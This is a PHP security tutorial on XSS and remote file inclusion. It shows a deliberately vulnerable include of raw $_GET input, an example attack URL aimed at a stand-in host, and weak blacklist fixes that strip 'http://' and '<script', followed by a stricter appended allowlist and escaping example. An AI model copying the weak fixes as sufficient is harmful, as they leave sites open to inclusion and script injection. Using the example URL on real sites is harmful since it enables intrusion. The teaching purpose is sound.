
Preventing XSS

Listed in PHP and MySQL » Security
This tutorial will simply go through a few ways to secure your PHP site further.

Introduction - Double yew tay eff is XSS?

XSS stands for cross-site scripting, and it is sometimes called CSS as well. I prefer XSS, since CSS has many meanings now.

If you've heard of PHP injection, XSS is somewhat similar, except that the attacker adds scripts. If your navigation system is bad enough, an XSS'er can even get shell access to your server when you don't have the right Apache modules installed!

AvengeX was a victim of XSS a while back, but I took a few simple steps to make sure that it wouldn't be attacked like this again.

Step One:

Check through your PHP navigation script. If your navigation looks like ?id=module&page=application, then this is good. Though, if you use ?x=whatever and it does this sort of thing:

<?php
// Whatever the visitor puts in ?x= is appended to ".php" and included as-is
$page = $_GET['x'] . ".php";
include($page);
?>

then your site is vulnerable. This means people could simply add this to the URL: ?x=http://www.evil-script.com/that/kills/your/site/hack, and then it'd include hack.php. Not good eh? So, the easiest way is just to take out the http bit. Your new code:

<?php
$page = $_GET['x'] . ".php";
// Strip the scheme so the value can no longer point at a remote URL
$page = str_replace('http://', '', $page);
include($page);
?>




Step Two:

Do you prevent SQL injection? If not, you should. Don't know how? Check out a2z's useful tutorial on securing user input.



Step Three:

JavaScript injection is the next best thing after SQL injection. What people can do with it:

- Cookie stealing

- Site redirecting

- Endless alerts

- Much, much more.

So when you're outputting from your database, all you have to do is stop the script tag:

<?php
// Break the "<script" text before it reaches the browser
$query_data = preg_replace("#<script#is", "<|script", $query_data);
echo $query_data;
?>


Notice I used preg_replace here. Each of the modifiers I used has one important function:
~ the i switch makes the match case-insensitive for every letter in "script"; with str_replace it would only match lowercase, or whichever case we had typed.
~ the s switch checks for the tag spread out over multiple lines. Some sites (namely MySpace.. hahaha..) were exploited by typing <script> over multiple lines. Some browsers (namely IE6.. hahaha..) would interpret this as a script tag and then run the code.
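A stricter take on Steps One and Three, added here as an example and not part of the original tutorial: an allowlist of page names instead of stripping http:// from the include path, and htmlspecialchars on output instead of blanking only the script tag. The page names, file names and $baseDir are assumptions.

```php
<?php
// Added example; not the tutorial's own code. Page names are hypothetical.

// Step One, stricter: map the ?x= value onto a fixed allowlist of local files.
// Anything not in the list falls back to the home page, so the request can
// never name a remote URL, a parent directory or a file we did not expect.
const PAGES = ['home' => 'home.php', 'news' => 'news.php', 'contact' => 'contact.php'];

function resolvePage(array $get, string $baseDir): string {
    $x = isset($get['x']) ? (string) $get['x'] : 'home';
    if (!array_key_exists($x, PAGES)) {
        $x = 'home';
    }
    return $baseDir . '/' . PAGES[$x];
}

// Step Three, stricter: escape database output for HTML instead of only
// breaking the "<script" text. Every < > & " ' becomes an entity, so no tag
// survives, however it is cased or however many lines it is split across.
function escapeForHtml(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed requests: a normal one and the remote-include one from Step One.
foreach ([['x' => 'news'], ['x' => 'http://www.evil-script.com/hack']] as $get) {
    echo resolvePage($get, __DIR__), "\n";   // both resolve inside __DIR__
}

// Constructed database values: the plain and the multi-line script tag from Step Three.
foreach (["<script>alert('hi')</script>", "<SCRIPT\n>alert('hi')</SCRIPT>"] as $row) {
    echo escapeForHtml($row), "\n";          // rendered as text, never as a tag
}
// At output time in your own page: echo escapeForHtml($query_data);
```

Escaping at output time covers every tag, not just script, which is why it is preferred over a blacklist of tag names.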



Congratulations..

You're halfway there. Now that you've done everything you can on your site to stop XSS, you need to have a talk with your host and ask whether mod_security is installed on the server.



Mod_Security - What is it?

To put it as simply as I can, it's an Apache module that stops dodgy things from happening to the server. If anything does happen, it normally blocks it and logs it. It's a must-have Apache module, so any server without it is like living without your genitals, or something like that. Sorry to put it in such terms, I thought it would make an impact.



Where does my host get it?

Check out the Apache Modules website and look for it there, or go to Modsecurity.org/download to get it straight away.





That's about it, happy coding!



Will
